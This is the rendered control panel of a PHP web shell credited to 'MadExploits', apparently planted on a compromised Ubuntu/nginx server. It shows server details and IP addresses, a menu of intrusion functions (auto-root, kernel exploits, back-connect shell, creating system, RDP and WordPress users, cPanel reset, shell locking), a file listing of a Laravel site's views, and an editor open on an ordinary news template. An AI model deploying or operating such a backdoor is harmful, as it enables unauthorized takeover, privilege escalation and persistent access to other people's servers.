Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.159
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
new_tlmf /
resources /
views /
frontend /
[ HOME SHELL ]
Name
Size
Permission
Action
about_organization.blade.php
4.05
KB
-rw-rw-r--
aboutus.blade.php
6.68
KB
-rw-rw-r--
advisory_board.blade.php
1.86
KB
-rw-rw-r--
app.blade.php
9.95
KB
-rw-rw-r--
books.blade.php
2.65
KB
-rw-rw-r--
committee.blade.php
2.11
KB
-rw-rw-r--
gallery.blade.php
1.64
KB
-rw-rw-r--
index.blade.php
11.61
KB
-rw-rw-r--
member.blade.php
3.92
KB
-rw-rw-r--
news.blade.php
1.91
KB
-rw-rw-r--
patrons.blade.php
1.77
KB
-rw-rw-r--
publication.blade.php
2.08
KB
-rw-rw-r--
reports.blade.php
2.29
KB
-rw-rw-r--
show_gallery.blade.php
3.34
KB
-rw-rw-r--
show_news.blade.php
1.82
KB
-rw-rw-r--
show_publication.blade.php
3.7
KB
-rw-rw-r--
video.blade.php
1.55
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : news.blade.php
@extends('frontend.app') @section('content') <!-- Header Start --> <div class="container-fluid bg-primary py-5 mb-5 page-header"> <div class="container py-5"> <div class="row justify-content-center"> <div class="col-lg-10 text-center"> <h1 class="display-3 text-white animated slideInDown">News </h1> <nav aria-label="breadcrumb"> <ol class="breadcrumb justify-content-center"> <li class="breadcrumb-item"><a class="text-white" href="/">Home</a></li> <li class="breadcrumb-item text-white active" aria-current="page"> <a href="/frontend/news">News</a></li> </ol> </nav> </div> </div> </div> </div> <!-- Header End --> <div class="container"> <div class = "row"> @foreach ($news as $data) <div class="col-lg-4 col-md-4 col-sm-6 col-xs-12 d-flex align-items-stretch justify-content-center" style="margin-top: 1rem; margin-bottom: 1rem;"> <div class="card" style="overflow: hidden;"> <div style="margin-left: 1rem; margin-right:1rem;margin-top:1rem;"> @if ($data->image == null) <img class="card-img-top" src="/frontend/images/newspaper.png" height="200" alt="{{ $data->title }}"> @else <img class="card-img-top" src="/news_photos/{{$data->image}}" height="200" alt="{{ $data->title }}"> @endif </div> <div class="card-body"> <h5 class="card-title">{{$data->title}}</h5> <p class="card-text">{!! \Illuminate\Support\Str::limit(strip_tags($data->description),100,'...') !!} </p> <a href="/frontend/news/{{$data->id}}" class="btn btn-secondary">Read More.....</a> </div> </div> </div> @endforeach </div> {{ $news->links() }} </div> @endsection
Close